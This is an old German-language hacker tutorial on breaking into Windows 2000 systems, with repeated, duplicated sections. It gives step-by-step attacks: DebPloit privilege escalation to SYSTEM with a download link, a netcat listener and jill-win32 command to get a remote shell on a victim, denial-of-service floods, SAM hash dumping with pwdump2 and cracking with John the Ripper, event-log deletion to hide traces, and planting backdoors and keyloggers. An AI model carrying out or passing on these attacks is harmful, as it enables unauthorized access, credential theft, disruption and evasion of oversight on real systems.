Ist FAT32 installiert (selten) kannst du die SAM loeschen und dich als Admin
anmelden. (Benutzer Administrator Kennwort: )
sei dir sicher das es installiert ist, sonst haste Bluescreens.
Benutz zum Beispiel Tools (CIA) und boot von der Floppy oder CD. Du kannst
alles alles erhalten (ich meine alles!)
Tools benutzen sollte immer die letzte Moeglichkeit sein.
DebPloit
°°°°°°°°
Ein Programm namens DebPloit soll ermoeglichen Adminrechte zu erhalten.
Von mir uebersetzte Anleitung dazu:
1. Werd dbgss client (DbgUiConnectToDbg).
2. Verbinde zu DbgSsApiPort Local Procedure Call (LPC) port (ZwConnectPort).
Jeder kann diesen Port oeffnen.
3. Frag dbgss to hadle CreateProcess SsApi mit der id des ziel clienten
4. Wart auf dbgss
Ask the debugging subsystem (smss.exe) to duplicate a handle to Target (any
process running on the local computer):
1. Become dbgss client (DbgUiConnectToDbg).
2. Connect to the DbgSsApiPort Local Procedure Call (LPC) port
(ZwConnectPort). Everyone can access this port.
3. Ask dbgss to handle CreateProcess SsApi with Target's client id
(ZwRequestPort).
4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT
(WaitForDebugEvent). Message contains a duplicated handle.
5. Impersonate your security context using a duplicated handle.
6. Execute any code (e.g. run an external program) in the security context
of Target.
Download DebPloit with a source code from:
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip
To test your system for this vulnerability:
1. Download DebPloit.zip and unzip it to the directory on your hard drive.
2. Logoff and login again using Guest (or any other non-administrative
account) account.
3. Run ERunAsX.exe from the command line and specify a program you wish to
execute under the SYSTEM account (e.g. "ERunAsX.exe cmd").
4. Your program now runs under the SYSTEM account and you can do everything
(e.g. create new user with an administrative privileges) on the local
computer.
Hotfix:
To close this hole and protect your computers and network against attacks
from the inside, you can use an unofficial Hotfix released by SmartLine,
Inc.
DebPloitFix is a Hotfix that closes the security hole using by the DebPloit
exploit. DebPloitFix is implemented as a kernel mode driver that can be run
dynamically (no need to restart your system). DebPloitFix assigns the new
security descriptor to the DbgSsApiPort LPC port so only the local system
(SYSTEM user) will be able to access this port.
+-+-+-+-+ (8) Scanning +-+-+-+-+
Bei TCP-Portscans tauchen folgende auf (in numerischer Reihenfolge):
88 Kerberos
389 LDAP
445 MS DS
464 LDAP
593 "
636 "
3268 Global Katalog
3269 "
3372 "
6586 "
wobei die Global Katalog sehr selten auftaucht.
..../~ (3) Denial of Service ~\....
IIP-Bug
°°°°°°°
Was du brauchst: netcat, jill-win32.exe
Start netcat und schreib: nc -vv -l -p 3003
vergiss die enter taste nicht
Fuehre jill-win32.exe so aus: jill-win32 opfer 80 angreifer 3003
Jetzt geht die Shell auf.
so was muesste kommen
listening on [any] 3003 ...
connect to [localhost] from opfer.lop
[#13]
Micro$oft Windows 2000 [Version blabla]
(C) Copyright 1985-1999 Micro$oft Corp.
c:\winnt\system32>
schreib weiter: whoami
und du erfaehrst welche Position du hast.
achja zu #13 - 13 entspricht carriage return-> enter taste
BInary Zero Attack
°°°°°°°°°°°°°°°°°°
Needed: netcat
Schickt man binaere Nullen von an einen offenen Port hat das eine
100prozentige Auslastung zu folge. Realisiert wird das mit netcat: nc
zielhost port < /dev/zero
Dieser Angriff hat Wirkung auf folgenden TCP Ports: 7 9 21 23 7778
und auf folgenden UDP Ports: 53 67 68 135 137 500 1812 1813 2535 3456
Bei UDP braucht es in netcat das -u
Ueber SMB
°°°°°°°°°
Sende SMB Anfragen auf 445 oder 139 und bestaetige die Antwort NICHT. Jetzt
liegen alle SMB Services fuer ca 20 Sekunden lahm
EFS nutzen
°°°°°°°°°°
Wenn du autoexex.bat mit EFS verschluesselt ist es lokal unmoeglich sich
anzumelden. Warum? Lies dir den Abschnitt Architektur durch.
::.. (4) Passwoerter erhalten ...::
HaShs
°°°°°
Notwendig:
- DOS benutzen koennen
- John The Ripper
- pwdump2
Gut zu haben:
- L0pht Crack
Wie benutzt man Pwdump2?
Pwdump is ein HaSh-hol Prog das in DOS laeuft. Die SAM ist von Win2000 schon
geschuetzt egal wie dumm der Admin ist und du kannst es auch nicht oeffnen
oder kopieren oder senden oder sonst was. pwdump is gut um die Hashes zu
bekommen.
Was jetzt kommt ist was du so in etwa tun solltest, wir nehmen an pwdump2 is
auf c: alles laeuft (was du schon wissn muesttest) unter DOS
Gehen wir zum Ordner:
c:\cd pwdump2
Jetzt sind wir im Verzeichnis und geben <pwdump2> und sehen das
c:\pwdump2\pwdump2
Administrator:500:f22487de2f1sdaw0aad3b435b51404ee :d0c3985a7dsawq190d8b04c06
1c3e:::
Guest:501:aad3b435b51404eeaad3asdwb51404ee:31d6cfs daw16ae931b73c59d7e0c089c0
:::
HelpAssistant:1000:158dbeae7e5dasf9a2515e837c97827 :9cfec91asdwdb011860fa3816
6da9eaa1:::
You:1003:8c96188dd805daf3aaddas251404ee:96ce08a2c2 dsa0296c8e673506d763d9:::
Aber das sind keine aktuellen Hashes.
Na dann wir sehen im ersten Teil den Benutzernamen (Username)
Dann folgen die HaShes und noch ein paar Sachen (is komlett egal)
Jetzt speichern wir die SAM nach c: als textfile
c:\pwdump2\pwdump2 > c:\pass.txt
c:\pwdump2
Jetzt is er gespeichert und wir verwenden John the Ripper (JTR)
Einfuehrend: JTR wird in DOS verwendet, es ist ein Cracker der BruteForce
und Dictionary Attacks anwenden kann.
Jetzt zeig ich wie das geht:
c:\john.exe -i:all c:pass.txt
Loaded 3 passwords with no different salts <NT LM DES [24/32 4K]>
Die HaShes sind geladen und jetzt muessen wir sie cracken
Optionen dafuer
alle werden nur an john.exe drangehaengt
-i: das kann mit den naechsten in Verbindung genutzt werden
alpa nur Buchstaben
digits nur Zahlen
all Alle Zeichen
Bsp: c:\john.exe -i:digits c:pass.txt
Wenn du alle Options sehen willst schreib: john.exe ohne optionen oder
geladenene PWs
Was tust du mit L0pht Crack?
zum beispiel:
+ SMB capture (HaSh fangen)
+ Registry Dump (Hashes aus Reg)
+ und komplettes Nicht-da-sein; es kann komplett versteckt werden sodass es
weder am Desktop noch in der Taskleiste oder TaskManager.
alles das wirst du dir selbst beibringen; LC4 ist das (mir bekannte)
aktuellste.
Direkt an die SAM
°°°°°°°°°°°°°°°°°
Die SAM (Security Account Manager) File liegt immer noch \system32\config
und eine Kopie unter \repair
L0pht Crack ist nur noch brauchbar wenn es bei einem NT System in einem
win2k Netzwerk liegt. Also die Sicherheit wird durch NT heruntergezogen.
einige der folgenden Methoden brauchen zwei Sachen: das Wissen eine autorun
cd zu erstellen und die Moeglichkeit von einer Diskette oder CD zu booten,
was (meist) soviel heist wie das BIOS zu veraendern (hack dich rein, na
los!).
weiter im text:
Ist FAT32 installiert (selten) kannst du die SAM loeschen und dich als Admin
anmelden. (Benutzer Administrator Kennwort: )
sei dir sicher das es installiert ist, sonst haste Bluescreens.
Benutz zum Beispiel Tools (CIA) und boot von der Floppy oder CD. Du kannst
alles alles erhalten (ich meine alles!)
Tools benutzen sollte immer die letzte Moeglichkeit sein.
DebPloit
°°°°°°°°
Ein Programm namens DebPloit soll ermoeglichen Adminrechte zu erhalten.
Von mir uebersetzte Anleitung dazu:
1. Werd dbgss client (DbgUiConnectToDbg).
2. Verbinde zu DbgSsApiPort Local Procedure Call (LPC) port (ZwConnectPort).
Jeder kann diesen Port oeffnen.
3. Frag dbgss to hadle CreateProcess SsApi mit der id des ziel clienten
4. Wart auf dbgss
Ask the debugging subsystem (smss.exe) to duplicate a handle to Target (any
process running on the local computer):
1. Become dbgss client (DbgUiConnectToDbg).
2. Connect to the DbgSsApiPort Local Procedure Call (LPC) port
(ZwConnectPort). Everyone can access this port.
3. Ask dbgss to handle CreateProcess SsApi with Target's client id
(ZwRequestPort).
4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT
(WaitForDebugEvent). Message contains a duplicated handle.
5. Impersonate your security context using a duplicated handle.
6. Execute any code (e.g. run an external program) in the security context
of Target.
Download DebPloit with a source code from:
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip
To test your system for this vulnerability:
1. Download DebPloit.zip and unzip it to the directory on your hard drive.
2. Logoff and login again using Guest (or any other non-administrative
account) account.
3. Run ERunAsX.exe from the command line and specify a program you wish to
execute under the SYSTEM account (e.g. "ERunAsX.exe cmd").
4. Your program now runs under the SYSTEM account and you can do everything
(e.g. create new user with an administrative privileges) on the local
computer.
Hotfix:
To close this hole and protect your computers and network against attacks
from the inside, you can use an unofficial Hotfix released by SmartLine,
Inc.
DebPloitFix is a Hotfix that closes the security hole using by the DebPloit
exploit. DebPloitFix is implemented as a kernel mode driver that can be run
dynamically (no need to restart your system). DebPloitFix assigns the new
security descriptor to the DbgSsApiPort LPC port so only the local system
(SYSTEM user) will be able to access this port.
&&&&&&&&&&&6 (5) Clearing 6&&&&&&&&&&&&
Datein auf einem System zu speichern ist immer riskant, merk dir das. Aber
es ist manchmal notwendig. Mach das mit dem cp Utility, nich mit der Hide
Option, das kennt mittlerweile jader.
Alle Protokolle werden lokal gespeichert und deshalb kannst du die Revision
über MMC-Snap-In für Gruppenrichtlinien unter %Computerverwaltung\Windows-
Einstellungen\Sicherheitseinstellungen\Lokale Richtlinie\Richtlinie
überwachen
Ich weis nicht wie das in Englisch heisst. Schreibts mir wenn moeglich.
Mit ein wenig denken kannst du auch andere Protokolle loeschen: sie sind
alle unter %Systemwerkzeuge\Ereignisanzeige
<+++++ (6) Trojans & Backdoors ++++++>
Das tollste ist ja wenn man an System immer rankommt weil man eine Backdoor
hat, find ich.
NetBus, BO2000, WinVNC, IKS (Invisible Keylogger Stealth) funktionieren
ausgezeichnet.
Du kannst sie unterbringen in dem du den Relative Shell Path Bug ausnutzt,
hab ich aber noch nie getan. Autostart ging immer gut.
+-+-+-+-+ (8) Scanning +-+-+-+-+
Bei TCP-Portscans tauchen folgende auf (in numerischer Reihenfolge):
88 Kerberos
389 LDAP
445 MS DS
464 LDAP
593 "
636 "
3268 Global Katalog
3269 "
3372 "
6586 "
wobei die Global Katalog sehr selten auftaucht.
__________________________________________________ ____________________________________________
Danke und Entschuldigung an all jene denen ich ohne einverstaendnis
Textinhalte oder Ideen "gestohlen" habe:
+ Marco Ruef
+ Prof. Wiesner
+ -=Moses=-
+ Andrea Pinzani
+ LLNK
+ Der Typ der die .doc file sicherheit_windows_2000
+ allen rootboardern
+ Manweis Janie
indirekt beigetragen:
+ The Doors
+ Marylin Monroe
+ Jim Jarmusch
wenn ihr nicht verstanden habt dann lest euch alles noch mal durch dann seid
ihr wieder am:
*E*O*F*